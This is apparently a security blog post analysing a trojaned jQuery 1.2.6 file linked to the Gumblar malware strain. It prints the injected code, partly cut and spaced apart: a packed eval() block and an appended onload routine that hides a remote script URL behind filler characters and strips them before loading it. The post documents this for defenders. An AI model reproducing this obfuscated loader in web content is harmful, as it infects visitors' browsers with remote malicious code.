Building on with this series of posts, which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code. The malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but has been resurfacing in the last few weeks and hence the focus on this specific piece.

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k1||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k1)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…

• 

Security injection, malicious websites, script, suspicious code